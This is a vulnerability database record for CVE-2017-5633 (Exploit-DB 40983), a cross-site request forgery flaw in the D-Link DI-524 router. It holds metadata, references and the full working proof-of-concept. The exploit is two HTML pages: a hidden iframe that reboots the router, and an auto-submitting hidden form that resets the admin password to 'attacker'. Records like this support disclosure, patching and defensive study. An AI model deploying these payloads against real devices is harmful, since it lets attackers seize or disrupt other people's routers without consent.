ID

VAR-E-201612-0014


CVE

cve_id:CVE-2017-5633

Trust: 1.3

sources: BID: 96475 // EXPLOIT-DB: 40983

EDB ID

40983


TITLE

D-Link DI-524 - Cross-Site Request Forgery - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 40983

DESCRIPTION

D-Link DI-524 - Cross-Site Request Forgery. CVE-2017-5633. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 40983

AFFECTED PRODUCTS

vendor: d link | model: di-524 | scope: - | version: -

Trust: 1.6

vendor: dlink | model: di-524 | scope: eq | version: 9.01

Trust: 0.3

sources: BID: 96475 // EXPLOIT-DB: 40983 // EDBNET: 97031

EXPLOIT

Title: D-Link DI-524 - Cross-Site-Request-Forgery Vulnerability
Credit: Felipe Soares de Souza
Date: 09/12/2016
Vendor: D-Link
Product: D-Link DI-524 Wireless 150
Product link: https://dlink.com.br/produto/di-524150
Version: Firmware 9.01

1- Reboot the device
<html>
<head>
<title>CSRF - Reboot the device</title>
</head>
<body>
<iframe width="1" height="1" src="http://192.168.0.1/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status"> </iframe>
</body>
</html>

2- Change admin account

<html>
<head>
<title>CSRF - Change admin account</title>
</head>
<body>
<form method="POST" action="http://192.168.1.1/cgi-bin/pass">
<input type="hidden" name="rc" value="@atbox">
<input type="hidden" name="Pa" value="attacker">
<input type="hidden" name="p1" value="attacker">
</form>

<script type="text/javascript">
document.forms[0].submit();
</script>
</body>
</html>

Trust: 1.0

sources: EXPLOIT-DB: 40983

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 40983

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 40983

TYPE

Cross-Site Request Forgery

Trust: 1.6

sources: EXPLOIT-DB: 40983 // EDBNET: 97031

CREDITS

Felipe Soares de Souza

Trust: 0.6

sources: EXPLOIT-DB: 40983

EXTERNAL IDS

db: EXPLOIT-DB | id: 40983

Trust: 1.6

db: NVD | id: CVE-2017-5633

Trust: 1.3

db: EDBNET | id: 97031

Trust: 0.6

db: BID | id: 96475

Trust: 0.3

sources: BID: 96475 // EXPLOIT-DB: 40983 // EDBNET: 97031

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2017-5633

Trust: 1.0

url:https://www.exploit-db.com/exploits/40983/

Trust: 0.6

url:http://seclists.org/fulldisclosure/2017/feb/70

Trust: 0.3

url:http://www.dlink.co.in/

Trust: 0.3

sources: BID: 96475 // EXPLOIT-DB: 40983 // EDBNET: 97031

SOURCES

db: BID | id: 96475
db: EXPLOIT-DB | id: 40983
db: EDBNET | id: 97031

LAST UPDATE DATE

2022-07-27T10:00:44.142000+00:00


SOURCES UPDATE DATE

db: BID | id: 96475 | date: 2017-03-07T01:08:00

SOURCES RELEASE DATE

db: BID | id: 96475 | date: 2017-02-27T00:00:00
db: EXPLOIT-DB | id: 40983 | date: 2016-12-09T00:00:00
db: EDBNET | id: 97031 | date: 2018-03-11T00:00:00